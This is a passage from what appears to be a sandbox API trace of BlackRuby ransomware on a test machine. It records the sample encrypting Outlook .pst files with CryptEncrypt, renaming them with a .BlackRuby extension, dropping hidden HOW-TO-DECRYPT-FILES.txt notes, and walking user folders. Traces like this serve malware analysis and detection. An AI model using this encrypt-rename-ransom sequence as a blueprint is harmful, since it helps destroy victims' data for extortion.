hProv=0x37c4e8, pbData=0x1c65e20, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360f20) returned 1 [0059.417] GetLastError () returned 0x0 [0059.417] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.417] GetLastError () returned 0x0 [0059.422] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.422] GetLastError () returned 0x0 [0059.422] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360b20) returned 1 [0059.422] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.422] GetLastError () returned 0x0 [0059.422] CryptSetKeyParam (hKey=0x360b20, dwParam=0x4, pbData=0x1c92e6c*=0x1, dwFlags=0x0) returned 1 [0059.422] GetLastError () returned 0x0 [0059.422] CryptSetKeyParam (hKey=0x360b20, dwParam=0x1, pbData=0x1c92e38, dwFlags=0x0) returned 1 [0059.422] GetLastError () returned 0x0 [0059.425] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2c42df0*, pdwDataLen=0x18ed08*=0x42500, dwBufLen=0x42500 | out: pbData=0x2c42df0*, pdwDataLen=0x18ed08*=0x42500) returned 1 [0059.427] GetLastError () returned 0x0 [0059.430] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c92ec8*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c92ec8*, pdwDataLen=0x18ed20*=0x10) returned 1 [0059.430] GetLastError () returned 0x0 [0059.430] CryptEncrypt (in: hKey=0x360b20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c92ef8*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c92ef8*, pdwDataLen=0x18ed28*=0x10) returned 1 [0059.430] GetLastError () returned 0x0 [0059.436] CryptDestroyKey (hKey=0x360f20) returned 1 [0059.436] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.436] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0059.436] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x3a [0059.436] GetLastError () returned 0x0 [0059.436] SetErrorMode (uMode=0x1) returned 0x0 [0059.436] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.439] GetLastError () returned 0xb7 [0059.439] GetFileType (hFile=0x184) returned 0x1 [0059.439] SetErrorMode (uMode=0x0) returned 0x1 [0059.439] GetFileType (hFile=0x184) returned 0x1 [0059.444] CloseHandle (hObject=0x184) returned 1 [0059.444] GetLastError () returned 0xb7 [0059.444] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpFilePart=0x0) returned 0x3a [0059.444] GetLastError () returned 0xb7 [0059.444] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Encrypted_48p0Vi10dzlWA2XHSvYXyRl0FdXkQRnRx3w4B8.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Encrypted_48p0Vi10dzlWA2XHSvYXyRl0FdXkQRnRx3w4B8.BlackRuby", lpFilePart=0x0) returned 0x63 [0059.444] GetLastError () returned 0xb7 [0059.444] SetErrorMode (uMode=0x1) returned 0x0 [0059.444] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x74e91a80, ftCreationTime.dwHighDateTime=0x1d2fb32, ftLastAccessTime.dwLowDateTime=0x74e91a80, ftLastAccessTime.dwHighDateTime=0x1d2fb32, ftLastWriteTime.dwLowDateTime=0x2ba06820, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x42510)) returned 1 [0059.444] GetLastError () returned 0xb7 [0059.444] SetErrorMode (uMode=0x0) returned 0x1 [0059.444] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Encrypted_48p0Vi10dzlWA2XHSvYXyRl0FdXkQRnRx3w4B8.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\encrypted_48p0vi10dzlwa2xhsvyxyrl0fdxkqrnrx3w4b8.blackruby")) returned 1 [0059.444] GetLastError () returned 0xb7 [0059.445] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0059.445] GetLastError () returned 0xb7 [0059.445] SetErrorMode (uMode=0x1) returned 0x0 [0059.445] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.445] GetLastError () returned 0x0 [0059.445] GetFileType (hFile=0x184) returned 0x1 [0059.446] SetErrorMode (uMode=0x0) returned 0x1 [0059.446] GetFileType (hFile=0x184) returned 0x1 [0059.446] CloseHandle (hObject=0x184) returned 1 [0059.447] GetLastError () returned 0x0 [0059.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0059.447] GetLastError () returned 0x0 [0059.447] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.447] GetLastError () returned 0x0 [0059.447] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", lpFilePart=0x0) returned 0x45 [0059.447] GetLastError () returned 0x0 [0059.447] SetErrorMode (uMode=0x1) returned 0x0 [0059.447] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), fInfoLevelId=0x0, lpFileInformation=0x1cafd84 | out: lpFileInformation=0x1cafd84*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf60f53c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xf60f53c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xf61d9c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0059.447] GetLastError () returned 0x0 [0059.447] SetErrorMode (uMode=0x0) returned 0x1 [0059.448] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", lpFilePart=0x0) returned 0x45 [0059.448] GetLastError () returned 0x0 [0059.448] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", lpFilePart=0x0) returned 0x45 [0059.448] GetLastError () returned 0x0 [0059.448] SetErrorMode (uMode=0x1) returned 0x0 [0059.448] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.448] GetLastError () returned 0x0 [0059.448] GetFileType (hFile=0x184) returned 0x1 [0059.448] SetErrorMode (uMode=0x0) returned 0x1 [0059.448] GetFileType (hFile=0x184) returned 0x1 [0059.448] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x42400 [0059.448] GetLastError () returned 0x0 [0059.449] ReadFile (in: hFile=0x184, lpBuffer=0x2d8e780, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x2d8e780*, lpNumberOfBytesRead=0x18ed18*=0x42400, lpOverlapped=0x0) returned 1 [0059.463] GetLastError () returned 0x0 [0059.463] CloseHandle (hObject=0x184) returned 1 [0059.463] GetLastError () returned 0x0 [0059.465] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", lpFilePart=0x0) returned 0x45 [0059.465] GetLastError () returned 0x0 [0059.465] SetErrorMode (uMode=0x1) returned 0x0 [0059.465] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf60f53c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xf60f53c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xf61d9c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0059.465] GetLastError () returned 0x0 [0059.465] SetErrorMode (uMode=0x0) returned 0x1 [0059.476] CryptImportKey (in: hProv=0x37c680, pbData=0x1d0c160, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ae0) returned 1 [0059.476] GetLastError () returned 0x0 [0059.476] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.477] GetLastError () returned 0x0 [0059.516] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.516] GetLastError () returned 0x0 [0059.516] CryptDuplicateKey (in: hKey=0x360ae0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360aa0) returned 1 [0059.516] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0059.516] GetLastError () returned 0x0 [0059.516] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x4, pbData=0x1b28104*=0x1, dwFlags=0x0) returned 1 [0059.516] GetLastError () returned 0x0 [0059.516] CryptSetKeyParam (hKey=0x360aa0, dwParam=0x1, pbData=0x1b280d0, dwFlags=0x0) returned 1 [0059.516] GetLastError () returned 0x0 [0059.517] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2ae8450*, pdwDataLen=0x18ed08*=0x42500, dwBufLen=0x42500 | out: pbData=0x2ae8450*, pdwDataLen=0x18ed08*=0x42500) returned 1 [0059.519] GetLastError () returned 0x0 [0059.520] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b28160*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1b28160*, pdwDataLen=0x18ed20*=0x10) returned 1 [0059.520] GetLastError () returned 0x0 [0059.520] CryptEncrypt (in: hKey=0x360aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b28190*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1b28190*, pdwDataLen=0x18ed28*=0x10) returned 1 [0059.520] GetLastError () returned 0x0 [0059.523] CryptDestroyKey (hKey=0x360ae0) returned 1 [0059.523] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.523] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0059.523] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", lpFilePart=0x0) returned 0x45 [0059.523] GetLastError () returned 0x0 [0059.523] SetErrorMode (uMode=0x1) returned 0x0 [0059.523] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.526] GetLastError () returned 0xb7 [0059.526] GetFileType (hFile=0x184) returned 0x1 [0059.526] SetErrorMode (uMode=0x0) returned 0x1 [0059.526] GetFileType (hFile=0x184) returned 0x1 [0059.530] CloseHandle (hObject=0x184) returned 1 [0059.531] GetLastError () returned 0xb7 [0059.531] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst", lpFilePart=0x0) returned 0x45 [0059.531] GetLastError () returned 0xb7 [0059.531] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Encrypted_wdUNgf9nORe0kcF5o3lu7c2nQhrHFFKnvGKfLU6zXyYvcca.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Encrypted_wdUNgf9nORe0kcF5o3lu7c2nQhrHFFKnvGKfLU6zXyYvcca.BlackRuby", lpFilePart=0x0) returned 0x6c [0059.531] GetLastError () returned 0xb7 [0059.531] SetErrorMode (uMode=0x1) returned 0x0 [0059.531] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf60f53c0, ftCreationTime.dwHighDateTime=0x1d2fb2f, ftLastAccessTime.dwLowDateTime=0xf60f53c0, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x2bac4f00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x42510)) returned 1 [0059.531] GetLastError () returned 0xb7 [0059.531] SetErrorMode (uMode=0x0) returned 0x1 [0059.531] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Outlook Data File - mail.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\outlook data file - mail.pst"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\Encrypted_wdUNgf9nORe0kcF5o3lu7c2nQhrHFFKnvGKfLU6zXyYvcca.BlackRuby" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\encrypted_wdungf9nore0kcf5o3lu7c2nqhrhffknvgkflu6zxyyvcca.blackruby")) returned 1 [0059.531] GetLastError () returned 0xb7 [0059.531] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x41 [0059.531] GetLastError () returned 0xb7 [0059.531] SetErrorMode (uMode=0x1) returned 0x0 [0059.532] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.532] GetLastError () returned 0x5 [0059.533] SetErrorMode (uMode=0x0) returned 0x1 [0059.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads", lpFilePart=0x0) returned 0x1a [0059.534] GetLastError () returned 0x5 [0059.534] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.534] GetLastError () returned 0x5 [0059.534] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.534] GetLastError () returned 0x5 [0059.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads", lpFilePart=0x0) returned 0x1a [0059.534] GetLastError () returned 0x5 [0059.534] SetErrorMode (uMode=0x1) returned 0x0 [0059.534] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.534] GetLastError () returned 0x5 [0059.534] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.534] GetLastError () returned 0x5 [0059.534] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.534] GetLastError () returned 0x5 [0059.534] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.534] GetLastError () returned 0x5 [0059.534] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.534] GetLastError () returned 0x12 [0059.534] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.534] SetErrorMode (uMode=0x0) returned 0x1 [0059.534] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads", lpFilePart=0x0) returned 0x1a [0059.534] GetLastError () returned 0x12 [0059.534] SetErrorMode (uMode=0x1) returned 0x0 [0059.535] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.535] GetLastError () returned 0x12 [0059.535] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.535] GetLastError () returned 0x12 [0059.535] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.535] GetLastError () returned 0x12 [0059.535] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.535] GetLastError () returned 0x12 [0059.535] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0059.535] GetLastError () returned 0x12 [0059.535] FindClose (in: hFindFile=0x360ae0 | out: hFindFile=0x360ae0) returned 1 [0059.535] SetErrorMode (uMode=0x0) returned 0x1 [0059.535] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\ChromeSetup.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads\\ChromeSetup.exe", lpFilePart=0x0) returned 0x2a [0059.535] GetLastError () returned 0x12 [0059.535] SetErrorMode (uMode=0x1) returned 0x0 [0059.535] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\ChromeSetup.exe" (normalized: "c:\\users\\eebsym5\\downloads\\chromesetup.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b46850 | out: lpFileInformation=0x1b46850*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb3ba6b0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0xc9ff0fd0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xcbf08f30, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x113f58)) returned 1 [0059.535] GetLastError () returned 0x12 [0059.535] SetErrorMode (uMode=0x0) returned 0x1 [0059.536] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0059.536] GetLastError () returned 0x12 [0059.536] SetErrorMode (uMode=0x1) returned 0x0 [0059.536] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\downloads\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0059.545] GetLastError () returned 0x0 [0059.545] GetFileType (hFile=0x184) returned 0x1 [0059.545] SetErrorMode (uMode=0x0) returned 0x1 [0059.545] GetFileType (hFile=0x184) returned 0x1 [0059.545] WriteFile (in: hFile=0x184, lpBuffer=0x1b62230*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed98, lpOverlapped=0x0 | out: lpBuffer=0x1b62230*, lpNumberOfBytesWritten=0x18ed98*=0x18da, lpOverlapped=0x0) returned 1 [0059.546] GetLastError () returned 0x0 [0059.546] CloseHandle (hObject=0x184) returned 1 [0059.546] GetLastError () returned 0x0 [0059.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e960, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0059.546] GetLastError () returned 0x0 [0059.546] SetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0059.546] GetLastError () returned 0x0 [0059.546] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\desktop.ini", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads\\desktop.ini", lpFilePart=0x0) returned 0x26 [0059.546] GetLastError () returned 0x0 [0059.546] SetErrorMode (uMode=0x1) returned 0x0 [0059.547] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\desktop.ini" (normalized: "c:\\users\\eebsym5\\downloads\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x1b63eac | out: lpFileInformation=0x1b63eac*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8ee4cf0, ftCreationTime.dwHighDateTime=0x1d2da0e, ftLastAccessTime.dwLowDateTime=0x8ee4cf0, ftLastAccessTime.dwHighDateTime=0x1d2da0e, ftLastWriteTime.dwLowDateTime=0xec4346c0, ftLastWriteTime.dwHighDateTime=0x1d2f581, nFileSizeHigh=0x0, nFileSizeLow=0x11a)) returned 1 [0059.547] GetLastError () returned 0x0 [0059.547] SetErrorMode (uMode=0x0) returned 0x1 [0059.547] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x33 [0059.547] GetLastError () returned 0x0 [0059.547] SetErrorMode (uMode=0x1) returned 0x0 [0059.547] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Downloads\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\downloads\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0059.547] GetLastError () returned 0x5 [0059.548] SetErrorMode (uMode=0x0) returned 0x1 [0059.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites", nBufferLength=0x105, lpBuffer=0x18ea00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites", lpFilePart=0x0) returned 0x1a [0059.549] GetLastError () returned 0x5 [0059.549] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0059.549] GetLastError () returned 0x5 [0059.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e924, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0059.549] GetLastError () returned 0x5 [0059.549] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites", nBufferLength=0x105, lpBuffer=0x18e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Favorites", lpFilePart=0x0) returned 0x1a [0059.549] GetLastError () returned 0x5 [0059.549] SetErrorMode (uMode=0x1) returned 0x0 [0059.549] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Favorites\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ae0 [0059.549] GetLastError () returned 0x5 [0059.549] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.549] GetLastError () returned 0x5 [0059.549] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0059.549] GetLastError () returned 0x5 [0059.549] FindNextFileW (in: hFindFile=0x360ae0, lpFindFileData=0x364560 | out: 